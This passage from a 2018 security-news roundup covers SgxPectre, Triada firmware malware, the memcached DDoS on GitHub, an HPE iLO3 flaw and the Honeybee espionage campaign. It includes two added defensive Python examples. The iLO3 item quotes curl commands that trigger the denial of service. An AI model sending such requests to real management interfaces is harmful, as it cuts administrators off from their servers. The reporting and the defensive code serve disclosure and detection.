During this installation step, stage 4, stage 5, and stage 6 payloads, along with additional files, are potentially dropped under a folder located in C:\ProgramData or in the user application data folder. Stage 4 is a loader for UAC bypass or installation with admin rights, stage 5 is a payload injected into explorer.exe or winlogon.exe, while stage 6 is the main malware executable.

The stage 5 malware only provides one more layer of obfuscation for the final payload (through the VM) and sets up a special Structured Exception Handler routine to ensure stealthy operation. After checking the environment once again, it extracts and executes the final payload in the injected process (it uses RunDll to implement the spyware).

SgxPectre attack allows attackers to reveal the content of the SGX enclave
5.3.2018 securityaffairs

A group of researchers from the Ohio State University has discovered a new variation of the Spectre attack, named SgxPectre, that allows attackers to reveal the content of an SGX enclave.
A group of researchers from the Ohio State University has discovered a new variation of the Spectre attack named SgxPectre.

Intel Software Guard eXtensions (SGX) is a technology for application developers that allows select code and data to be protected from disclosure or modification. Intel SGX allows application code to execute within an Intel SGX enclave, a protected area of execution in memory.

We have long discussed both the Spectre and Meltdown vulnerabilities in Intel processors and the ways to exploit them.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

Meltdown exploits speculative execution to breach the isolation between user applications and the operating system; in this way, any application can access all system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

While the exploitation of Meltdown or Spectre doesn’t allow attackers to extract data from SGX enclaves, the SgxPectre attack exploits the bugs in Intel CPUs to reveal the content of the SGX enclave.

“SGXPECTRE Attacks that exploit the recently disclosed CPU bugs to subvert the confidentiality of SGX enclaves. Particularly, we show that when branch prediction of the enclave code can be influenced by programs outside the enclave, the control flow of the enclave program can be temporarily altered to execute instructions that lead to observable cache-state changes.” reads the paper published by the researchers.

“An adversary observing such changes can learn secrets inside the enclave memory or its internal registers, thus completely defeating the confidentiality guarantee offered by SGX.”

According to the experts, almost any enclave program could be vulnerable to the SGXPECTRE attack.

The SgxPectre attack leverages specific code patterns in the software libraries that developers use to add SGX support to their applications. The required code patterns are present in most SGX runtimes, including the Intel SGX SDK, Rust-SGX, and Graphene-SGX.

Basically, SgxPectre is a cache side-channel attack against enclave programs.

The researchers explained that their attack is based on observing the repetitive code execution patterns that the software development kits introduce into SGX enclaves and the associated changes in cache state.

“In particular, because vulnerable code patterns exist in most SGX runtime libraries (e.g., Intel SGX SDK, Rust-SGX, Graphene-SGX) and are difficult to be eliminated, the adversary could perform SGXPECTRE Attacks against any enclave programs.” continues the paper.

“We demonstrate end-to-end attacks to show that the adversary could learn the content of the enclave memory, as well as its register values in such attacks.”

Intel plans to address SgxPectre with a security update for the Intel SGX SDK that will be released on March 16.

Developers will need to update their application by using the new SDK version.

The experts released a video PoC of the attack while the PoC code was published on GitHub.

GCHQ fears energy smart meters could expose millions of Britons to hacking
4.3.2018 securityaffairs BigBrothers

In the United Kingdom, new smart energy meters that are set to be installed in 27 million homes were found vulnerable by GCHQ.
Unsecured IoT devices are a favorite target of hackers, and unfortunately smart energy meters belong to this category.

In the UK, new smart energy meters that are set to be installed in 27 million homes were found vulnerable by GCHQ.

According to the intelligence agency, the vulnerabilities could be exploited by hackers to compromise the IoT devices, posing a serious risk to users.

In 2017, some energy providers in the UK, including British Gas, E.on, Npower, Scottish Power and EDF, started testing SMETS 2 smart energy meters, the successor of SMETS 1 meters.

The new model of smart energy meters addressed several issues that affected the 8 million SMETS 1 meters.

SMETS 2 smart energy meters solved various problems that both consumers and energy firms faced with the first-generation SMETS 1 meters. Unlike the older SMETS 1 meters, SMETS 2 meters can be used by UK energy suppliers to receive meter readings remotely and electronically.

The SMETS 2 smart energy meters were also designed to interoperate with different suppliers, so consumers can change energy provider without needing to change their meters.

According to a post published by The Telegraph, GCHQ has raised concerns over the security of the smart energy meters. Attackers could hack them to steal personal details and defraud consumers by tampering with their bills.

“Cyber security experts say that making the meters universal will make them more attractive to hackers because the potential returns are so much greater if they can hack every meter using the same software.” states The Telegraph.

“The cyber criminals are able to artificially inflate meter readings, making bills higher.

They then try to intercept payments, and if they simply skim off the difference between the real reading and the false reading, energy companies will think the bill has been paid normally.”

The intelligence agency also warned that attackers could use the devices as a “Trojan horse” to enter customers’ networks.

The UK Government also fears that nation-state actors could exploit the flaws in the energy smart meters to create a power surge that would damage the National Grid.

Security experts also warn of BlueBorne attacks that could potentially expose smart meters to compromise through their Bluetooth connections.

Robert Cheesewright, of Smart Energy GB, the Government-funded agency promoting the smart meter roll-out, tried to downplay the risks, explaining that no financial data is directly managed by the devices; evidently, however, his explanation doesn’t consider other attack scenarios.

“Smart meters are one of the safest and most secure pieces of technology in your home.” said Robert Cheesewright.

“Only energy data is stored on a meter and this is encrypted. Your name, address, bank account or other financial details are not stored on the meter.”

Risks associated with vulnerable smart meters have already been analyzed in the past: in 2014 the security researchers Javier Vazquez Vidal and Alberto Garcia Illera discovered that millions of network-connected electricity meters in Spain were susceptible to cyberattack due to a lack of proper security controls.

Bitcoin-linked heist: thieves stole 600 powerful computers in Iceland
4.3.2018 securityaffairs Cryptocurrency

Thieves steal 600 powerful computers in a huge heist in Iceland with the intent to use them for mining Bitcoin.
Cybercriminal organizations continue to show great interest in cryptocurrencies, and the number of crimes against the cryptocurrency industry is on the rise.

News of the day is that crooks have stolen 600 powerful computers from data centers in Iceland to use for Bitcoin mining. At the time of writing, the computers, which are worth almost $2 million, have not yet been found.

“Some 600 computers used to “mine” bitcoin and other virtual currencies have been stolen from data centers in Iceland in what police say is the biggest series of thefts ever in the North Atlantic island nation.” reads the post published by The Associated Press.

The thieves stole 600 graphics cards, 100 processors, 100 power supplies, 100 motherboards and 100 sets of computer memory to use in the profitable activity.

The Icelandic media dubbed the crime the “Big Bitcoin Heist,” and the authorities have arrested 11 people, including a security guard.

A judge at the Reykjanes District Court on Friday ordered two people to remain in custody.

“This is a grand theft on a scale unseen before,” Police Commissioner Olafur Helgi Kjartansson said. “Everything points to this being a highly organized crime.”

The thefts occurred between late December and early January; the members of the gang were identified thanks to the surveillance cameras used by the server company Advania.

Advania suffered two of the four thefts; the company had been offering its customers access to bitcoin-mining rigs, which is why the crooks targeted it.

The police are searching for any evidence to track the thieves, and authorities are also tracking energy consumption across Iceland in case they turn on the computers. A spike in energy consumption could reveal their location if the thieves don’t take measures to avoid being tracked.

“Police tracking the stolen computers are monitoring electric consumption across the country in hopes the thieves will show their hand, according to an industry source who spoke on condition of anonymity because he is not allowed to speak to the media.” concluded the Associated Press.

“Unusually high energy usage might reveal the whereabouts of the illegal bitcoin mine.”

Iceland is a good place to find cheap, renewable energy for crypto-mining activities.

Over 40 models of low-cost Android devices shipped with Triada banking Trojan
4.3.2018 securityaffairs Android

Security researchers at Dr.Web have discovered that over 40 models of low-cost Android smartphones are shipped with the dreaded Android Triada banking malware.
Security researchers at Antivirus firm Dr.Web have discovered that 42 models of low-cost Android smartphones are shipped with the Android.Triada.231 banking malware.

“In the middle of 2017, Doctor Web analysts discovered a new Trojan Android.Triada.231 in the firmware of some cheap models of Android devices. Since this detection, the list of infected devices has been constantly increasing.” reads the blog post published by Dr.Web. “At the moment, the list contains over 40 models. Doctor Web specialists have monitored the Trojan’s activity and now we can publish the results of this investigation.”

The Triada Trojan was spotted for the first time in 2016 by researchers at Kaspersky Lab, who considered it the most advanced mobile threat seen to that date.

Triada was designed with the specific intent of committing financial fraud, typically by hijacking financial SMS transactions. The most interesting characteristic that sets the Triada Trojan apart is its modular architecture, which theoretically gives it a wide range of abilities.

The Triada Trojan makes use of the Zygote parent process to inject its code into the context of all software on the device, which means the threat is able to run inside each application.
The only way to remove the threat is to wipe the smartphone and reinstall the OS.

Researchers at Dr.Web discovered the Triada Trojan pre-installed on newly shipped devices from several minor brands, including Advan, Cherry Mobile, Doogee, and Leagoo.

This isn’t the first time the company has discovered pre-installed malware on Android devices: back in July 2017, Dr.Web researchers discovered that many smartphone models, such as the Leagoo M5 Plus, Leagoo M8, Nomu S10, and Nomu S20, were shipped with the dreaded Triada Trojan.

The researchers at Dr.Web who investigated the issue discovered that a software developer from Shanghai was responsible for the infection.

“For example, it was detected on the Leagoo M9 smartphone that was announced in December 2017. Additionally, our analysts’ research showed that the Trojan’s penetration into firmware happened at request of the Leagoo partner, the software developer from Shanghai.” continues the blog post.

“This company provided Leagoo with one of its applications to be included into an image of the mobile operating system, as well as with an instruction to add third-party code into the system libraries before their compilation. Unfortunately, this controversial request did not evoke any suspicions from the manufacturer. Ultimately, Android.Triada.231 got to the smartphones without any obstacles.”

The infected app found on the device was developed by a Chinese firm; the experts highlighted that the code was signed with the same certificate that was observed in the 2016 infections.

“The analysis of this application showed it is signed with the same certificate as Android.MulDrop.924. Doctor Web previously wrote about this Trojan in 2016. We can presume the developer that requested adding the additional program into the mobile operating system image can be connected expressly or implicitly with the distribution of Android.Triada.231.” continues Dr.Web.

At the moment, the experts have confirmed detecting Android.Triada.231 in the firmware of the following Android device models:

Leagoo M5
Leagoo M5 Plus
Leagoo M5 Edge
Leagoo M8
Leagoo M8 Pro
Leagoo Z5C
Leagoo T1 Plus
Leagoo Z3C
Leagoo Z1C
Leagoo M9
ARK Benefit M8
Zopo Speed 7 Plus
Doogee X5 Max
Doogee X5 Max Pro
Doogee Shoot 1
Doogee Shoot 2
Tecno W2
Homtom HT16
Umi London
Kiano Elegance 5.1
iLife Fivo Lite
Mito A39
Vertex Impress InTouch 4G
Vertex Impress Genius
myPhone Hammer Energy
Advan S5E NXT
Advan S4Z
Advan i5E
Tesla SP6.2
Cubot Rainbow
Haier T51
Cherry Mobile Flare S5
Cherry Mobile Flare J2S
Cherry Mobile Flare P1
Pelitt T1 PLUS
Prestigio Grace M5 LTE
BQ 5510

Unfortunately, the number of infected smartphone models could be much bigger.

GitHub hit by the biggest-ever DDoS attack, which peaked at 1.35 Tbps
4.3.2018 securityaffairs

On February 28, 2018, the popular GitHub code hosting website was hit by the largest-ever distributed denial of service (DDoS) attack, which peaked at 1.35 Tbps.
On February 28, 2018, the popular GitHub’s code hosting website was hit by the largest-ever distributed denial of service (DDoS) attack.

The DDoS attack peaked at a record 1.35 Tbps; the attackers abused the memcached protocol to power a so-called memcached DDoS attack.

Memcached is a free and open source, high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load.

Clients communicate with memcached servers via TCP or UDP on port 11211.

Researchers from Cloudflare, Arbor Networks and security firm Qihoo 360 recently discovered that attackers are abusing memcached servers for DDoS amplification attacks.

Chinese experts warned about abuses of memcached DDoS attacks in November.

The abuse of memcached servers in DDoS attacks is quite simple: the attacker sends a request to an exposed memcached server on port 11211 with the source IP address spoofed to that of the victim. In a memcached DDoS attack, the request sent to the server is composed of a few bytes, while the response can be tens of thousands of times bigger, resulting in an amplification attack.

Experts at Cloudflare dubbed this type of attack Memcrashed; according to the researchers, the technique could give attackers an amplification factor of 51,200.

The GitHub website is protected by the anti-DDoS service provided by Akamai, which confirmed the impressive magnitude of the attack that hit its client.

“At 17:28 GMT, February 28th, Akamai experienced a 1.3 Tbps DDoS attack against one of our customers, a software development company, driven by memcached reflection. This attack was the largest attack seen to date by Akamai, more than twice the size of the September, 2016 attacks that announced the Mirai botnet and possibly the largest DDoS attack publicly disclosed.” reads the analysis published by Akamai.

“Because of memcached reflection capabilities, it is highly likely that this record attack will not be the biggest for long.”

According to GitHub, the attack was widespread, it originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints.

“On Wednesday, February 28, 2018 GitHub.com was unavailable from 17:21 to 17:26 UTC and intermittently unavailable from 17:26 to 17:30 UTC due to a distributed denial-of-service (DDoS) attack.” states an advisory post published by GitHub.

“Between 17:21 and 17:30 UTC on February 28th we identified and mitigated a significant volumetric DDoS attack.

The attack originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints. It was an amplification attack using the memcached-based approach described above that peaked at 1.35Tbps via 126.9 million packets per second.”

GitHub routed its traffic to Akamai’s service to mitigate the ongoing DDoS attack.

“Given the increase in inbound transit bandwidth to over 100Gbps in one of our facilities, the decision was made to move traffic to Akamai, who could help provide additional edge network capacity. At 17:26 UTC the command was initiated via our ChatOps tooling to withdraw BGP announcements over transit providers and announce AS36459 exclusively over our links to Akamai.” continues Github.

“Routes reconverged in the next few minutes and access control lists mitigated the attack at their border. Monitoring of transit bandwidth levels and load balancer response codes indicated a full recovery at 17:30 UTC. At 17:34 UTC routes to internet exchanges were withdrawn as a follow-up to shift an additional 40Gbps away from our edge.”

GitHub confirmed that the first portion of the attack peaked at 1.35 Tbps, while a second part peaked at 400 Gbps after 18:00 UTC.

GitHub said it plans to expand its edge network and mitigate new attack vectors.

Researchers believe that threat actors in the wild will abuse misconfigured memcached servers in future attacks; unfortunately, many of them are still exposed on the Internet.

Cloudflare recommends disabling UDP support unless it’s needed and isolating memcached servers from the Internet. Internet service providers have to fix vulnerable protocols and prevent IP spoofing.

“Internet Service Providers – In order to defeat such attacks in future, we need to fix vulnerable protocols and also IP spoofing. As long as IP spoofing is permissible on the internet, we’ll be in trouble.” concluded Cloudflare.

“Developers – Please please please: Stop using UDP. If you must, please don’t enable it by default. If you do not know what an amplification attack is I hereby forbid you from ever typing
into your editor.”
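An added defender-side example, not code from the article or from Cloudflare, GitHub or Akamai: it flags hosts that receive large UDP datagrams from port 11211 across several distinct reflectors (what a memcached reflection victim sees in flow data) and audits a memcached command line for the exposure Cloudflare's advice targets (UDP enabled, listening on all interfaces). The flow-record format and the sample flows are constructed; the audit assumes memcached's classic defaults of UDP on 11211 unless -U 0 is given and binding to all interfaces unless -l is given.

```python
"""Detect memcached reflection traffic in flow records and audit a memcached
command line for the exposure described in the article (UDP on 11211
reachable from the Internet). Flow-record format is constructed for this
example; it is not a real collector's format."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Sequence, Set, Tuple

MEMCACHED_PORT = 11211


@dataclass
class Flow:
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    packets: int
    nbytes: int


def parse_flow(line: str) -> Flow:
    """Parse one constructed flow record:
    '<proto> <src_ip>:<src_port> <dst_ip>:<dst_port> <packets> <bytes>'."""
    proto, src, dst, packets, nbytes = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return Flow(proto.upper(), src_ip, int(src_port), dst_ip, int(dst_port),
                int(packets), int(nbytes))


def is_memcached_reflection(flow: Flow, min_avg_payload: int = 1000) -> bool:
    """Response side of the attack: UDP datagrams *from* port 11211 whose
    average size is far larger than the few-byte request that elicited them.
    Ordinary clients send requests to 11211; large unsolicited replies are
    the amplified traffic a victim receives."""
    if flow.proto != "UDP" or flow.src_port != MEMCACHED_PORT or flow.packets == 0:
        return False
    return flow.nbytes / flow.packets >= min_avg_payload


def find_victims(lines: Sequence[str], min_reflectors: int = 3
                 ) -> List[Tuple[str, int, int]]:
    """Return (victim_ip, distinct_reflectors, total_bytes) for destinations
    receiving reflected memcached traffic from at least min_reflectors hosts.
    Requiring several distinct reflectors filters out a single chatty server."""
    reflectors: Dict[str, Set[str]] = defaultdict(set)
    volume: Dict[str, int] = defaultdict(int)
    for line in lines:
        flow = parse_flow(line)
        if is_memcached_reflection(flow):
            reflectors[flow.dst_ip].add(flow.src_ip)
            volume[flow.dst_ip] += flow.nbytes
    return sorted((ip, len(srcs), volume[ip])
                  for ip, srcs in reflectors.items() if len(srcs) >= min_reflectors)


def audit_memcached_args(argv: Sequence[str]) -> List[str]:
    """Report the two exposures Cloudflare's advice targets. Assumes the classic
    memcached defaults (UDP on 11211 unless '-U 0', all interfaces unless '-l');
    pass the daemon's full argument list, e.g. from the process table."""
    udp_port = MEMCACHED_PORT
    listen = "0.0.0.0"
    args = list(argv)
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-U", "-l") and i + 1 < len(args):   # separate value: -U 0
            value, i = args[i + 1], i + 1
        elif arg.startswith(("-U", "-l")) and len(arg) > 2:  # joined: -U0
            value = arg[2:]
        else:
            i += 1
            continue
        if arg.startswith("-U"):
            udp_port = int(value)
        else:
            listen = value
        i += 1
    findings = []
    if udp_port != 0:
        findings.append(f"UDP enabled on port {udp_port}; start with -U 0 unless UDP is required")
    if listen in ("0.0.0.0", "::"):
        findings.append("listening on all interfaces; bind to localhost or an internal address with -l")
    return findings


# Constructed sample: 198.51.100.5 receives large UDP replies from three memcached
# servers it never queried (reflection); the 10.0.0.0/8 lines are normal TCP use.
SAMPLE_FLOWS = [
    "UDP 203.0.113.10:11211 198.51.100.5:38512 200 280000",
    "UDP 203.0.113.11:11211 198.51.100.5:38512 150 210000",
    "UDP 203.0.113.12:11211 198.51.100.5:38512 300 420000",
    "UDP 203.0.113.13:11211 198.51.100.5:38512 10 1200",   # small replies, not flagged
    "TCP 10.0.0.4:51000 10.0.0.9:11211 20 1800",            # client request traffic
    "TCP 10.0.0.9:11211 10.0.0.4:51000 20 6000",
]

if __name__ == "__main__":
    for victim, count, total in find_victims(SAMPLE_FLOWS):
        print(f"{victim}: reflected traffic from {count} memcached servers, {total} bytes")
    print(audit_memcached_args(["memcached", "-m", "64", "-p", "11211"]))   # two findings
    print(audit_memcached_args(["memcached", "-U", "0", "-l", "127.0.0.1"]))  # []
```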

Microsoft released Windows Updates that include Intel’s Spectre microcode patches
4.3.2018 securityaffairs

Microsoft announced this week the release of the microcode updates to address the Spectre vulnerability.
Last week Intel released microcode to address the CVE-2017-5715 Spectre vulnerability for many of its chips; let’s hope that this time the security updates will not cause further problems.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Problems such as frequent reboots were related to the fix for the CVE-2017-5715 Spectre flaw (Spectre Variant 2) and affected almost every platform, including systems running on Broadwell and Haswell CPUs, as well as Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

Microsoft is going to deliver microcode updates for Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core) running on devices with 6th Generation Intel Core (Skylake) processors.

“This update is a standalone update available through the Microsoft Update Catalog and targeted for Windows 10 version 1709 (Fall Creators Update) & Windows Server version 1709 (Server Core).” read the advisory published by Microsoft. “This update also includes Intel microcode updates that were already released for these Operating Systems at the time of Release To Manufacturing (RTM). We will offer additional microcode updates from Intel thru this KB Article for these Operating Systems as they become available to Microsoft.”

Microsoft confirmed that almost all Windows devices now have compatible security products installed and that all problems with the patches have been fixed.

“We have also been working closely with our anti-virus (AV) partners on compatibility with Windows updates, resulting in the vast majority of Windows devices now having compatible AV software installed.” wrote John Cable, Director of Program Management, Windows Servicing and Delivery.

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility.”

A flaw in HP Integrated Lights-Out 3 remote management hardware exposes servers to DoS
4.3.2018 securityaffairs

Hewlett Packard Enterprise issued a security patch to address a vulnerability (CVE-2017-8987) in HP remote management hardware Integrated Lights-Out 3.
Hewlett Packard Enterprise has issued a security patch to address a vulnerability (CVE-2017-8987) in its Integrated Lights-Out 3 remote management hardware, which equips the HP ProLiant server family.

The Hewlett-Packard iLO is composed of a physical card with a separate network connection that is used for the remote management of the device.

The vulnerability could be exploited by a remote attacker to mount a denial-of-service attack that, under some conditions, could cause severe problems for data centers.

The vulnerability in the HP Integrated Lights-Out 3 remote management hardware was discovered by Rapid7 researchers in September; the issue is rated “high severity” and has received a CVSS base score of 8.6.

“This post describes CVE-2017-8987, an unauthenticated remote Denial of Service vulnerability in HPE iLO3 firmware version 1.88. This vulnerability can be exploited by several HTTP methods; once triggered, it lasts for approximately 10 minutes until the watchdog service performs a restart of the iLO3 device. CVE-2017-8987 is categorized as CWE-400 (Resource Exhaustion) and has a CVSSv3 base score of 8.6.” states Rapid7.

Once an attacker has compromised a network, they can lock administrators out of the iLO and prevent them from restoring operations, causing severe problems for a data center.

“Several HTTP request methods cause iLO3 devices running firmware v1.88 to stop responding in several ways for 10 minutes:

SSH: open sessions will become unresponsive; new SSH sessions will not be established
Web portal: users cannot log in to the web portal; the login page will not successfully load
” continues Rapid7.

HPE publicly disclosed the vulnerability on Feb. 22.

“A security vulnerability in HPE Integrated Lights-Out 3 (iLO 3) allows remote Denial of Service (DoS).” reads the security advisory published by HPE.

“HPE has provided the following instructions to resolve the vulnerability in HPE Integrated Lights-Out 3 (iLO 3) version 1.88: Please upgrade to HPE Integrated Lights-Out 3 (iLO 3) 1.89 which is available on HPE Support Center:


HPE said that the affected version is the v1.88 firmware for HPE Integrated Lights-Out 3 (iLO3); other versions of the firmware (1.8, 1.82, 1.85, and 1.87) along with the firmware for iLO4 (v2.55) are not impacted.

According to Rapid7, iLO5 devices were not tested; the experts also observed that requests using the following four HTTP methods trigger the denial of service:

curl -X OPTIONS hp-ilo-3.testing.your-org.com
curl -X PROPFIND hp-ilo-3.testing.your-org.com
curl -X PUT hp-ilo-3.testing.your-org.com
curl -X TRACE hp-ilo-3.testing.your-org.com

Below is the disclosure timeline:

Sept 2017: Issue discovered
Thurs, Oct 19, 2017: Vendor released v1.89 update to iLO3, which addresses CVE-2017-8987
Mon, Nov 6, 2017: Vendor notified; vendor assigned PSRT110615 to this vulnerability
Wed, Nov 15, 2017: Additional details sent to vendor
Wed, Jan 10, 2018: Disclosed to CERT/CC
Wed, Jan 31, 2018: Vendor reported that v1.89 is not vulnerable to R7-2017-27; Rapid7 confirmed this finding.
Thurs, Feb 22, 2018: Public disclosure; vendor published security bulletin and assigned CVE-2017-8987
Thurs, Mar 1, 2018: Rapid7 published this post

Delta Patches Vulnerabilities in HMI, PLC Products
3.3.2018 securityweek

Taiwan-based Delta Electronics has patched several vulnerabilities in two of the company’s industrial automation products, including flaws that can be exploited for remote code execution.

A researcher who uses the online moniker “Axt” informed Delta via Trend Micro’s Zero Day Initiative (ZDI) and ICS-CERT that its WPLSoft product, a programming software for programmable logic controllers (PLCs), is affected by several types of vulnerabilities.

ICS-CERT’s advisory describes three types of flaws that can allow arbitrary code execution in the context of the current process or denial-of-service (DoS) attacks, specifically stack-based buffer overflow, heap-based buffer overflow, and out-of-bounds write issues. The security holes have been rated high severity and they are tracked as CVE-2018-7494, CVE-2018-7507 and CVE-2018-7509.

ZDI has published a total of nine advisories, one for each variation of these flaws. According to the company, the vulnerabilities are related to how the application parses .dvp files and they can be exploited by getting the targeted user to open a specially crafted file or webpage.

ZDI said it reported the security holes to Delta via ICS-CERT in February 2017. The company’s advisories suggest that the vendor attempted to release some patches last summer, but they did not properly fix the vulnerabilities. ZDI published its advisories in August 2017 with a “0Day” status.

ICS-CERT reported this week that the vulnerabilities were patched by Delta with the release of WPLSoft V2.46.0, which according to the vendor’s site was made available on February 2.

A separate advisory published this week by ICS-CERT describes a medium severity vulnerability found by researcher Ghirmay Desta in Delta’s DOPSoft human-machine interface (HMI) product.

The flaw, a stack-based buffer overflow, is related to the processing of .dop or .dpb files, and it can allow remote code execution. The issue affects DOPSoft 4.00.01 and prior, and it was patched with the release of version 4.00.04 on March 1.

This vulnerability was also reported to Delta via ZDI, but the company has yet to publish advisories. ZDI’s website shows a total of 17 upcoming advisories describing vulnerabilities found by Desta in the DOPSoft product in October 2017. Last year, the expert also found weaknesses in Delta’s PMSoft, a development tool for motion controllers.

ZDI was also recently informed by an anonymous researcher of four high severity flaws in an unnamed Delta product.

It’s not uncommon for ICS vendors to take hundreds of days to patch vulnerabilities. A report published last year by ZDI showed that the average patching time for SCADA flaws had been 150 days.

New Malware Used in Attacks Aimed at Inter-Korean Affairs
3.3.2018 securityweek Virus

A threat actor apparently interested in inter-Korean affairs continues to launch highly targeted attacks using new pieces of malware and decoy documents referencing North Korean political topics.

The cyber espionage group, which experts believe is sponsored by a nation state, has been active for several years, but it managed to stay under the radar until last year, when researchers analyzed two of its main tools, namely SYSCON and KONNI. These pieces of malware had been leveraged in attacks aimed at organizations linked to North Korea.

McAfee’s Advanced Threat Research team recently spotted a new campaign that appears to focus on North Korea, particularly humanitarian aid efforts. The security firm named this operation Honeybee based on the name of the user who created the malicious documents.

Previous research into this group’s activities and a new McAfee report claim the threat actor is likely a Korean speaker. In the past, some even suggested that the attacks may have been launched from South Korea.

However, McAfee told SecurityWeek that South Korea is most likely not behind the attacks. The security firm believes this is the work of an actor interested in inter-Korean affairs, specifically in English-language information.

The attack starts with a spear-phishing email carrying or linking to a malicious document. The document contains a macro designed to drop and execute a new version of the SYSCON backdoor. The malware allows attackers to upload files to a server, and download files to the compromised system and execute them.

The campaign appears to be mainly focused on North Korea, particularly humanitarian aid efforts, with primary targets located in Southeast Asia and the Americas. While many of the targeted entities are located in South Korea, some attacks are also aimed at users in Vietnam, Singapore, Japan, Indonesia, Canada and Argentina.

Some of the malicious documents used to deliver the malware reference North Korea – for example, one is named “International Federation of Red Cross and Red Crescent Societies – DPRK Country Office.”

Other documents, however, rely on a different approach. They display fake Google Docs or Microsoft Office messages that instruct recipients to enable editing and content in order to access the information. If users comply, malicious code is executed and malware is downloaded to their device.
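The macro dropper and the "enable content" lures described above can be triaged at the mail gateway before a document reaches a user. The following is an added example written for this page, not McAfee's or the attackers' code: it unpacks the OOXML container and reports whether a VBA project is present, whether the file extension promises a macro-free format, and whether the visible text carries an enable-content lure. The sample documents, the file names and the placeholder vbaProject.bin bytes are constructed in memory so the script runs offline.

```python
"""Triage check for macro-bearing Office documents before they reach a user.

Added example written for this page, not McAfee's or the attackers' code. It
inspects the OOXML zip container: a document carrying a VBA project has a
vbaProject.bin part and a matching content-type override in
[Content_Types].xml. The sample documents are constructed in memory so the
script runs offline; real lures would come from a mail-gateway quarantine.
"""
import io
import re
import zipfile
from typing import Dict

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# Extensions whose container may legitimately carry a VBA project.
MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm"}
# Phrases the decoy text of an "enable content" lure typically shows the reader.
LURE_PHRASES = ("enable content", "enable editing", "enable macros")
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def build_docx(body_text: str, with_macro: bool = False) -> bytes:
    """Construct a minimal OOXML document in memory (test fixture, not a real lure)."""
    overrides = ['<Override PartName="/word/document.xml" ContentType="application/'
                 'vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>']
    if with_macro:
        overrides.append('<Override PartName="/word/vbaProject.bin" '
                         f'ContentType="{VBA_CONTENT_TYPE}"/>')
    content_types = ('<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.'
                     'openxmlformats.org/package/2006/content-types">'
                     + "".join(overrides) + "</Types>")
    document_xml = (f'<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="{WORD_NS}">'
                    f'<w:body><w:p><w:r><w:t>{body_text}</w:t></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document_xml)
        if with_macro:
            # Placeholder bytes; a real vbaProject.bin is an OLE compound file.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


def triage(filename: str, data: bytes) -> Dict[str, object]:
    """Report whether a VBA project, an extension mismatch and lure text are present."""
    findings: Dict[str, object] = {"has_vba": False, "extension_mismatch": False,
                                   "lure_text": False, "error": None}
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
            types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            findings["has_vba"] = (any(n.lower().endswith("vbaproject.bin") for n in names)
                                   or VBA_CONTENT_TYPE in types_xml)
            # Strip tags first so a phrase split across runs still matches on plain text.
            text = " ".join(re.sub(r"<[^>]+>", " ", zf.read(n).decode("utf-8", "replace")).lower()
                            for n in names if n.endswith("document.xml"))
            findings["lure_text"] = any(p in text for p in LURE_PHRASES)
    except (zipfile.BadZipFile, KeyError) as exc:
        findings["error"] = f"not an OOXML package: {exc}"
        return findings
    # A VBA project inside a file whose extension promises a macro-free format is a
    # tampered package worth flagging on its own: nobody produces one by accident.
    findings["extension_mismatch"] = bool(findings["has_vba"]) and ext not in MACRO_EXTENSIONS
    return findings


def is_suspicious(findings: Dict[str, object]) -> bool:
    """Quarantine rule: a macro-bearing document that also carries an enable-content lure."""
    return bool(findings["has_vba"] and findings["lure_text"])


if __name__ == "__main__":
    # Constructed samples: a benign memo and a lure carrying a VBA project.
    samples = {
        "agenda.docx": build_docx("Meeting agenda for Monday"),
        "DPRK_country_office.docm": build_docx("Protected document. Please Enable Content to view.", True),
    }
    for name, blob in samples.items():
        result = triage(name, blob)
        print(f"{name}: suspicious={is_suspicious(result)} {result}")
```

The check covers OOXML packages only; a lure delivered as a legacy OLE .doc or .xls needs an OLE parser such as oletools' olevba, which also extracts the macro code and flags auto-executing entry points. A signed dropper of the MaoCheng kind needs its Authenticode chain checked separately: a valid signature made with a stolen certificate passes a bare "is it signed" test.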


Some of the droppers used in the Honeybee campaign are only disguised as documents. One dropper, tracked by McAfee as MaoCheng, has a document icon, but it’s actually an executable file signed with a stolen Adobe certificate. Once executed, MaoCheng opens a decoy document that instructs users to enable content in order to access the information.

McAfee said the MaoCheng dropper was likely created specifically for the Honeybee campaign and it has only been spotted two times. A new variant of the SYSCON backdoor was first seen by researchers on January 17, but the operation has relied on new implants since at least November 2017. Experts say many components are loosely based on previous versions of SYSCON, but they are unique from a code perspective.

